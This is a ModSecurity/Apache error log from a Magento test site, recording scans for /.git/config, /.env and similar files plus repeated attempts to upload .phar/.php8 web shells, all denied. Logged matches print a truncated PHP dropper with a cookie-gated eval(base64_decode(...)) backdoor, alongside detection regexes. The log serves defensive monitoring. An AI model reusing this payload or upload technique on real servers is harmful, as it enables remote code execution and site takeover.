[Fri Nov 28 13:27:26.654317 2025] [:error] [pid 384067] [client 64.227.70.2:57046] [client 64.227.70.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSmVLt1sP_DH5i5fGun4eQAAAAQ"]
[Fri Nov 28 22:39:50.949172 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Rule 7fa16a338be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.phar"] [unique_id "aSoWpon3sMqacK-1jBETgAAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:50.949693 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.phar"] [unique_id "aSoWpon3sMqacK-1jBETgAAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:50.952234 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.phar"] [unique_id "aSoWpon3sMqacK-1jBETgAAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:50.952435 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.phar"] [unique_id "aSoWpon3sMqacK-1jBETgAAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:51.095788 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ab88364f428d25.php8 found within FILES:custom_attributes[country_id]: ab88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSoWp4n3sMqacK-1jBETgQAAAA0"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/b/ab88364f428d25.phar
[Fri Nov 28 22:39:51.096472 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSoWp4n3sMqacK-1jBETgQAAAA0"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/b/ab88364f428d25.phar
[Fri Nov 28 22:39:51.096679 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSoWp4n3sMqacK-1jBETgQAAAA0"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/b/ab88364f428d25.phar
[Fri Nov 28 22:39:51.310053 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Rule 7fa16a338be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.php8"] [unique_id "aSoWp4n3sMqacK-1jBETggAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:51.310606 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.php8"] [unique_id "aSoWp4n3sMqacK-1jBETggAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:51.313067 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.php8"] [unique_id "aSoWp4n3sMqacK-1jBETggAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 22:39:51.313267 2025] [:error] [pid 393808] [client 213.109.224.165:19810] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/b/ab88364f428d25.php8"] [unique_id "aSoWp4n3sMqacK-1jBETggAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.556852 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Rule 7f3b55fd7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.phar"] [unique_id "aSsI1Cery-6FqaQsHPMsqgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.557348 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.phar"] [unique_id "aSsI1Cery-6FqaQsHPMsqgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.559819 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.phar"] [unique_id "aSsI1Cery-6FqaQsHPMsqgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.560008 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.phar"] [unique_id "aSsI1Cery-6FqaQsHPMsqgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.725670 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: de88364f428d25.php8 found within FILES:custom_attributes[country_id]: de88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSsI1Cery-6FqaQsHPMsqwAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/e/de88364f428d25.phar
[Sat Nov 29 15:53:08.726447 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSsI1Cery-6FqaQsHPMsqwAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/e/de88364f428d25.phar
[Sat Nov 29 15:53:08.726639 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSsI1Cery-6FqaQsHPMsqwAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/e/de88364f428d25.phar
[Sat Nov 29 15:53:08.921289 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Rule 7f3b55fd7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.php8"] [unique_id "aSsI1Cery-6FqaQsHPMsrAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.921761 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.php8"] [unique_id "aSsI1Cery-6FqaQsHPMsrAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.924252 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.php8"] [unique_id "aSsI1Cery-6FqaQsHPMsrAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Nov 29 15:53:08.924474 2025] [:error] [pid 406331] [client 185.65.202.110:47902] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/e/de88364f428d25.php8"] [unique_id "aSsI1Cery-6FqaQsHPMsrAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 07:48:07.951158 2025] [authz_core:error] [pid 420133] [client 139.59.136.184:33098] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 30 07:48:09.330518 2025] [:error] [pid 421121] [client 139.59.136.184:57180] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSvoqVoLn9vgVb4y1wTXPgAAAAo"]
[Sun Nov 30 07:48:09.330752 2025] [:error] [pid 421121] [client 139.59.136.184:57180] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSvoqVoLn9vgVb4y1wTXPgAAAAo"]
[Sun Nov 30 07:48:09.330919 2025] [:error] [pid 421121] [client 139.59.136.184:57180] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSvoqVoLn9vgVb4y1wTXPgAAAAo"]
[Sun Nov 30 07:48:09.629699 2025] [:error] [pid 420351] [client 139.59.136.184:57194] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvoqe4YmrDb6sVqZeFUHQAAAAc"]
[Sun Nov 30 07:48:09.629935 2025] [:error] [pid 420351] [client 139.59.136.184:57194] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvoqe4YmrDb6sVqZeFUHQAAAAc"]
[Sun Nov 30 07:48:09.630138 2025] [:error] [pid 420351] [client 139.59.136.184:57194] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvoqe4YmrDb6sVqZeFUHQAAAAc"]
[Sun Nov 30 07:48:10.363176 2025] [:error] [pid 421120] [client 139.59.136.184:57202] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSvoql1RgwzjQxTFQvL8SAAAAAg"]
[Sun Nov 30 07:48:10.363437 2025] [:error] [pid 421120] [client 139.59.136.184:57202] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSvoql1RgwzjQxTFQvL8SAAAAAg"]
[Sun Nov 30 07:48:10.363640 2025] [:error] [pid 421120] [client 139.59.136.184:57202] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSvoql1RgwzjQxTFQvL8SAAAAAg"]
[Sun Nov 30 09:19:30.802294 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Rule 7ffbb7073be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/4/m488364f428d25.phar"] [unique_id "aSv-Ei6tRBnriPIR7Vg5FgAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Nov 30 09:19:30.802812 2025] [:error] [pid 421122] [client 185.65.202.110:59216] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] 